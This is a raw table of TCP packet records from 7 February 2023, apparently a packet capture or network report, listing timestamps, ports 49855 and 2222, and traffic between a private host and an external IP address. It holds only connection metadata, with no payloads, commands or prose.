Feb 7, 2023 18:30:31.114099026 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.114099979 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.114161015 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.114269972 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.114269972 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.114440918 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.114561081 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.114571095 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.114609957 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.114609957 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.114835978 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.114989996 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.115348101 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.115359068 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.115367889 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.115375996 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.115384102 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.115519047 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.115547895 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.115556955 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.115565062 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.115611076 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.115663052 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.115710020 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.115884066 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.115896940 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.115959883 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.116128922 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.116605997 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117002964 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.117052078 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.117115974 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.117655993 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117666960 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117687941 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117805004 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.117813110 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117825031 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117832899 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117841005 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117849112 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117852926 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.117856979 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117865086 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117906094 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.117906094 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117908001 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117914915 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117968082 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.117976904 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.118076086 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.118120909 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.118155956 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.118254900 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.118417978 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.118514061 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.118514061 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.118684053 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.118849993 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.118988991 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.119003057 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.119034052 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.119041920 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.119050026 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.119057894 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.119443893 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.119492054 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.119518042 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.119528055 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.119535923 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.119541883 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.119714022 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.119884014 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.119916916 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.120050907 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.120100975 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.120111942 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.120421886 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.120536089 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.120712042 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.122133970 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.122145891 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.122262955 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.122273922 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.122283936 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.122292042 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.122299910 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.122349977 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.122396946 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.122447014 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.122447014 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.122621059 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.122788906 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.122802973 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.122998953 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123009920 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123018026 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123025894 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123034000 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123040915 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123094082 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123189926 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123284101 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.123317957 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123326063 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123334885 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.123382092 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.123475075 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.123487949 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.123627901 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123636007 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123646975 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.123708963 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123718023 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.123815060 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.124064922 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.124073029 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.124123096 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.124196053 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.124206066 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.124283075 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.124456882 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.124468088 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.124630928 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.124722004 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.124722004 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.125089884 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.125101089 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.125122070 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.125130892 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.125283957 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.125334024 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.125396013 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.125509977 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.125520945 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.125551939 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.125602961 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.125721931 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.125891924 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.125983000 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.126156092 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.126590014 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.126597881 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.126708984 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.126766920 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.126813889 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.126950979 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.127073050 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.127087116 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.127094984 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.127154112 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.127202988 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.127374887 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.127594948 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.127604008 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.127875090 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.127923965 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.127973080 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.128174067 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.128181934 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.128285885 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.128385067 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.128504992 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.128578901 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.128585100 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.128590107 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.128598928 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.128606081 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.128613949 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.128839970 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.129009008 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.129101992 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.129112959 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.129345894 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.129436016 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.129534960 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.129561901 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.129573107 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.129703045 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.129877090 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.129987955 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.130038023 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.130047083 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.130153894 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.130248070 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.130342007 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.130563974 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.130575895 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.130589962 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.130600929 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.130609035 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.130616903 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.130846024 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.130896091 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.130943060 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.131115913 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.150973082 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.151145935 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.151524067 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.151664019 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.151711941 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.151760101 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.152040005 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.152272940 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.152503967 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.152513981 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.152702093 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.152750969 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.153019905 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.153032064 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.153117895 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.153129101 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.153213978 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.153311014 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.153407097 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.153500080 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.153671980 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.153686047 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.153839111 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.154035091 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.154366016 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.154537916 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.154546976 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.154563904 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.154573917 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.154582024 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.154591084 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.154725075 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.154901981 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.154944897 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.154944897 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.155013084 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.155044079 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.155051947 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.155184984 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.155354023 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.155369997 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.155415058 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.155694008 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.155781984 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.156102896 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.156178951 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.156188965 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.156384945 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.156435013 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.156481981 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.156588078 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.156725883 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.156734943 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.156847000 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.156913996 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.156955004 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.157083035 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.157115936 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.157125950 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.157253981 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.157426119 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.157483101 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.157593966 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.157603979 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.157769918 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.157859087 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.157859087 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.157953978 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.158348083 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.158400059 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.158447027 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.158608913 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.158643961 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.158655882 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.158880949 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.159064054 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.159094095 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.159104109 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.159235954 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.159324884 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.159575939 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.159601927 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.159615993 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.159626007 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.159732103 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.159753084 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.159775972 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.159837008 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.160011053 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.160011053 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.160124063 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.160176039 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.160176039 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.160345078 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.160595894 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.160605907 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.160731077 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161036968 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.161062956 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161075115 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.161123991 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.161168098 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161176920 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161190033 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161202908 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161212921 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161221027 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161230087 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161237955 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161246061 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161254883 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161293030 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.161463976 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161621094 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161631107 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.161633968 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.161689997 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.161744118 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.161917925 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.162090063 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.162090063 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.162256002 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.162645102 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.162653923 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.162662983 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.162764072 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.162877083 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.162924051 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.162951946 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.162961006 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.162971973 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.163100958 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.163110018 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.163117886 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.163126945 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.163315058 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.163491011 CET	49855	2222	192.168.11.20	92.177.204.2
